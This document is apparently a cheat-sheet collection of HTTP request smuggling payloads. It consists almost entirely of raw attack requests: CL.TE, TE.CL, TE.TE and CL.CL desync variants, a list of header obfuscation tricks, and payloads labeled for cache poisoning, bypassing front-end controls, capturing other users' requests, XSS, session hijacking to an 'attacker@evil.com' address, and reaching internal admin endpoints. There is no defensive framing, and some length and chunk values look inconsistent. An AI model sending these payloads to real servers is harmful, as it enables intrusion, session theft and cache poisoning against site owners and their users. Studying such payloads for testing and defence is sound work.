# HTTP Request Smuggling Payloads

# CL.TE (Content-Length vs Transfer-Encoding)
# Front-end uses Content-Length, back-end uses Transfer-Encoding

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

---

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 6
Transfer-Encoding: chunked

0

G

---

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


---

# TE.CL (Transfer-Encoding vs Content-Length)
# Front-end uses Transfer-Encoding, back-end uses Content-Length

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0


---

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked

5e
POST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10

x=
0


---

# TE.TE (Transfer-Encoding obfuscation)
# Both servers handle Transfer-Encoding but one can be obfuscated

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


---

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: x

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


---

# Transfer-Encoding obfuscation variants
Transfer-Encoding: chunked
Transfer-Encoding: xchunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding: chunked
Transfer-encoding: chunked
Transfer-Encoding: chunked 
Transfer-Encoding: chunked;
Transfer-Encoding: chunked,
Transfer-Encoding: identity
Transfer-Encoding: identity, chunked
Transfer-Encoding: chunked, identity
Transfer-Encoding: chunked
Transfer-Encoding: identity
 Transfer-Encoding: chunked
Transfer-Encoding : chunked
Transfer-Encoding:chunked
Transfer-Encoding:
 chunked
Transfer-Encoding:
	chunked
[space]Transfer-Encoding: chunked
Transfer-Encoding[space]: chunked
Transfer-Encoding:[space]chunked
Transfer-Encoding: chu nked
Transfer-Encoding: chunk ed
Transfer-Encoding: chun\x0bked

# CL.CL (Duplicate Content-Length)
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 8
Content-Length: 7

12345
SMUGGLED

---

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 8
Content-Length: 9

test=1
SMUGGLED

---

# Cache poisoning via request smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 130
Transfer-Encoding: chunked

0

GET /static/script.js HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10

x=

---

# Bypassing front-end security controls
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Length: 100
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For: 127.0.0.1
Content-Length: 10

x=

---

# Capturing other users' requests
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 230
Transfer-Encoding: chunked

0

POST /log HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000

comment=

---

# XSS via request smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked

0

GET /search?q=<script>alert(1)</script> HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10

x=

---

# Web cache deception
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 180
Transfer-Encoding: chunked

0

GET /static/include.js HTTP/1.1
Host: vulnerable-website.com
X-Ignore: X

GET /account HTTP/1.1
Host: vulnerable-website.com

---

# Exploiting different chunk handling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked

96
POST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

csrf=token&action=delete
0


---

# Timing-based detection payload
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked

1
Z
Q

---

# Header injection for smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 200
Transfer-Encoding: chunked

0

GET / HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: evil.com
Content-Length: 10

x=

---

# Session hijacking
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 250
Transfer-Encoding: chunked

0

POST /account/update HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 150

email=attacker@evil.com&session=

---

# Smuggling with newlines
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding:
 chunked
Content-Length: 4

5c
SMUGGLED
0


---

# Smuggling with tabs
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding:	chunked
Content-Length: 4

5c
SMUGGLED
0


---

# HTTP/2 downgrade smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4

0

SMUGGLED

---

# Chunk size obfuscation
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked

0000000000000000000a
SMUGGLED123
0


---

# Negative Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: -1
Transfer-Encoding: chunked

0

SMUGGLED

---

# Very large Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 999999999
Transfer-Encoding: chunked

0

SMUGGLED

---

# Mixed line endings
POST / HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
Content-Length: 4\r\n
Transfer-Encoding: chunked\n
\r\n
5c\r\n
SMUGGLED\r\n
0\r\n
\r\n

---

# Unicode in headers
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Transfer‐Encoding: identity

0

SMUGGLED

---

# Multiple Host headers
POST / HTTP/1.1
Host: vulnerable-website.com
Host: evil.com
Content-Length: 4
Transfer-Encoding: chunked

0

SMUGGLED

---

# Smuggling to internal endpoints
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked

0

GET /internal/admin HTTP/1.1
Host: localhost
X-Forwarded-For: 127.0.0.1
Content-Length: 10

x=

---

# Cookie injection via smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 180
Transfer-Encoding: chunked

0

GET / HTTP/1.1
Host: vulnerable-website.com
Cookie: session=stolen_session_here
Content-Length: 10

x=

---

# Authorization bypass
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 200
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: vulnerable-website.com
Authorization: Bearer admin_token_here
Content-Length: 10

x=

---

# CRLF injection in chunks
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked

0\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
\r\n

---

# Smuggling via Content-Type
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

0

SMUGGLED

---

# Request line injection
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked

0

GPOST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10

x=

---

# Protocol smuggling (HTTP/1.1 -> HTTP/2)
POST / HTTP/1.1
Host: vulnerable-website.com
Upgrade: h2c
Connection: Upgrade, HTTP2-Settings
HTTP2-Settings: AAMAAABkAAQAAP__
Content-Length: 4
Transfer-Encoding: chunked

0

SMUGGLED
